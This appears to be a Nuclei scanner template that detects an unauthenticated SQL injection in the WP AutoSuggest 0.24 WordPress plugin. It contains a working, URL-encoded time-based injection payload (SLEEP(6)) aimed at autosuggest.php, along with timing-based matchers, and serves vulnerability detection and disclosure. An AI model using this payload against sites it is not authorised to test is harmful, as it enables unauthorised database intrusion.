id: wp-autosuggest-sql-injection

info:
  name: WP AutoSuggest 0.24 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    The wp-autosuggest WordPress plugin was affected by an Unauthenticated SQL Injection security vulnerability.
  reference:
    - https://wpscan.com/vulnerability/9188
    - https://wordpress.org/plugins/wp-autosuggest/
  metadata:
    max-request: 1
    verified: true
  tags: wp-plugin,wp,wp-autosuggest,wpscan,sqli,wordpress

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/wp-autosuggest/autosuggest.php?wpas_action=query&wpas_keys=1%27%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28SELECT%2F%2A%2A%2F5202%2F%2A%2A%2FFROM%2F%2A%2A%2F%28SELECT%28SLEEP%286%29%29%29yRVR%29%2F%2A%2A%2FAND%2F%2A%2A%2F%28%27dwQZ%27%2F%2A%2A%2FLIKE%2F%2A%2A%2F%27dwQZ"

    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'
          - 'status_code == 200'
          - 'contains(content_type, "text/xml")'
          - 'contains(body, "<results>")'
        condition: and